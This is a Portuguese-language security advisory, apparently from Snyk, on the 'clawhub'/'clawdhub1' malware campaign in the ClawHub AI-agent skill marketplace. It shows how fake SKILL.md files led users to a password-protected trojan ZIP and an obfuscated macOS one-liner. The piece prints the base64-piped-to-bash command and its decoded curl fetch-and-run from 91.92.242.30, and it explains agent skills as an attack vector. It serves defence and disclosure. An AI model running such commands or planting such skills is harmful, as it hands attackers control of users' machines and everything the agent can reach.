In this article
Por dentro da campanha maliciosa “clawdhub”: habilidades de agente de IA instalam reverse shells no marketplace OpenClaw
No domingo, 2 de fevereiro, a equipe de pesquisa de segurança da Snyk descobriu uma campanha de malware direcionada, inserida diretamente no marketplace de habilidades ClawHub (clawhub.ai), um repositório popular de recursos para agentes de IA.
A entrada maliciosa, publicada originalmente pelo usuário zaycv com o nome clawhub, se passa por uma ferramenta CLI oficial para gerenciar habilidades de agentes. Embora a versão original tenha sido removida em 3 de fevereiro, pesquisadores da Snyk identificaram uma variante ainda ativa, chamada clawdhub1, que já registra quase 100 instalações.

Essa campanha ativa confirma os alertas urgentes emitidos pela Snyk no início deste ano sobre os riscos de segurança dos assistentes pessoais de IA e o perigo específico de arquivos “SKILL.md” servirem como vetores de ataque. Se você interagiu com habilidades do “ClawHub CLI” ou seguiu instruções de instalação do usuário zaycv nas últimas 48 horas, considere que sua máquina foi comprometida.
A cadeia de infecção do clawdhub1
O ataque usa um mecanismo de entrega em várias etapas que contorna a análise estática (limitada) do ClawHub, mantendo toda a lógica maliciosa fora do arquivo SKILL.md.
1. Engenharia social: a promessa de desempenho
O invasor, zaycv, usa jargão técnico para atrair usuários avançados. A descrição da habilidade promete “cache e compressão avançados” e “otimização de desempenho” para a publicação de habilidades. Essa abordagem específica mira desenvolvedores que provavelmente se frustram com a latência das ferramentas padrão, tornando-os mais propensos a instalar um utilitário de “otimização” sem questionar os pré-requisitos.

2. O vetor para Windows: evasão com senha
Para usuários do Windows, o arquivo SKILL.md leva a uma versão no GitHub hospedada pelo usuário Ddoy233 (uma conta criada especificamente para essa campanha).
Repositório: https://github.com/Ddoy233/openclawcli
Técnica: o arquivo compactado (
openclawcli.zip) é protegido por senha (senha:openclaw).Por que isso importa: criptografar o arquivo ZIP é uma técnica deliberada usada para contornar verificadores de segurança automatizados, filtros de e-mail e verificações de segurança do navegador que tentam inspecionar o conteúdo de arquivos compactados em busca de assinaturas de malware. Dentro dele, a “CLI” contém um executável trojanizado e DLLs que provavelmente funcionam como um ladrão de informações.

3. O vetor para macOS: execução ofuscada via Glot.io
As instruções para macOS direcionam os usuários a um trecho de código no glot.io, um serviço para compartilhar código. Isso cria uma camada adicional de indireção: o código malicioso não está no arquivo SKILL.md nem é baixado diretamente como um arquivo.
A camada de ofuscação: o trecho parece exibir uma mensagem inofensiva, “Installer-Package”, mas encaminha uma string em base64 para o bash:
A URL
download.setup-service.comé uma string-isca, criada para parecer uma fonte legítima de pacotes na saída do terminal e tranquilizar o usuário.A cadeia base64 -D | bash é o gatilho que executa o código.
1echo "Installer-Package: https://download.setup-service.com/pkg/" && echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC81MjhuMjFrdHh1MDhwbWVyKSI=' | base64 -D | bashA carga maliciosa: após a decodificação, o comando busca diretamente um script de shell em um endereço IP bruto:
1/bin/bash -c "$(curl -fsSL http://91.92.242.30/528n21ktxu08pmer)"Isso executa uma carga maliciosa de segundo estágio a partir de 91.92.242.30, um endereço IP sem reputação confiável que contorna listas de bloqueio de domínios.
Cronologia da descoberta
2 de fev. de 2026: Luca Beurer-Kellner, engenheiro de pesquisa sênior da Snyk, identifica a habilidade maliciosa original
clawhub(7.743 downloads) no marketplace.3 de fev. de 2026: a habilidade
clawhubé removida do marketplace.3 de fev. de 2026 (mais tarde): Aleksei Kudrinskii, engenheiro de incubação da Snyk, descobre que o invasor voltou com uma variante renomeada,
clawdhub1, que continua ativa e operacional.4 de fev. de 2026: a Snyk publica este alerta de segurança.
A perspectiva da Snyk: como proteger a cadeia de suprimentos de IA
Este incidente evidencia um ponto cego crítico na “pilha de IA” moderna. Estamos deixando para trás um mundo de dependências de código e entrando em um mundo de dependências de recursos de agentes.
As ferramentas tradicionais de AppSec analisam seu código e seus contêineres. Elas não leem as instruções em inglês de um arquivo SKILL.md nem validam a intenção por trás do “uso de ferramentas” de um agente de IA.
O risco “picante” dos fluxos de trabalho agentivos: como discutimos em nossa análise do Clawdbot, agentes de IA como o OpenClaw costumam receber permissões amplas — para ler e-mails, acessar sistemas de arquivos e executar comandos de shell — a fim de serem úteis como assistentes. Quando uma habilidade maliciosa como clawdhub1 é instalada, ela herda essas permissões. O malware não compromete apenas a máquina: ele pode comprometer todos os serviços aos quais o agente de IA tem autorização para acessar, de repositórios do GitHub à infraestrutura em nuvem.
É aqui que o Snyk Evo entra em ação. A plataforma Evo da Snyk e o AI-SPM (gerenciamento da postura de segurança de IA) foram desenvolvidos para governar exatamente esse tipo de interação sem controle:
Modelos e ferramentas de IA não gerenciados: o Evo detecta quando desenvolvedores ou agentes introduzem ferramentas externas não verificadas (como uma habilidade aleatória de um marketplace) no ambiente corporativo.
Visibilidade da cadeia de suprimentos: assim como o Snyk Advisor avalia pacotes npm, a pesquisa de segurança de IA da Snyk agora se dedica a avaliar a reputação de habilidades de agentes e pesos de modelos, sinalizando anomalias como um “novo usuário” (
zaycv) que publica uma “ferramenta crítica do sistema” sem nenhum histórico na comunidade.
Como se defender contra malware em SKILLS e MCP
A Snyk oferece várias maneiras de se proteger contra ameaças nativas de IA:
Ferramentas como o mcp-scan (Scanner do Model Context Protocol) representam a próxima evolução da defesa, garantindo que as instruções dadas aos agentes não levem ao comprometimento do sistema. O MCP Scan vai detectar servidores MCP intencionalmente maliciosos por meio de injeção de prompt ou envenenamento de ferramentas e também detectar arquivos SKILL.md maliciosos e arriscados.
Ferramentas como o AI-BOM da Snyk (que você também pode executar facilmente com o comando
snykaibom) ajudam a descobrir quais componentes de IA estão sendo usados em toda a sua base de código, incluindo modelos de IA, agentes, servidores MCP, conjuntos de dados e plug-ins.
Correção e indicadores de comprometimento (IOCs)
Ações imediatas:
Bloqueie o tráfego: bloqueie imediatamente o tráfego de saída para
91.92.242.30no firewall.Audite as habilidades: verifique sua conta ClawHub e as configurações locais dos agentes em busca de habilidades chamadas
clawhubouclawdhub1, instaladas pelo usuáriozaycv.Execute verificações da Snyk: garanta que seus ambientes de desenvolvimento de IA sejam analisados.
Indicadores de comprometimento (IOCs):
Domínios/IPs: 91.92.242.30
URLs: https://glot.io/snippets/hfd3x9ueu5, https://github.com/Ddoy233/openclawcli
Nomes de usuário: zaycv (ClawHub), Ddoy233 (GitHub)
Nomes de pacotes: clawhub, clawdhub1
Referências:
GUIA
Unifique o controle da IA agentiva com Evo by Snyk
Evo by Snyk oferece a líderes de segurança e engenharia uma orquestração unificada em linguagem natural para a segurança de IA. Descubra como Evo coordena agentes especializados para oferecer proteção de ponta a ponta em todo o ciclo de vida da sua IA.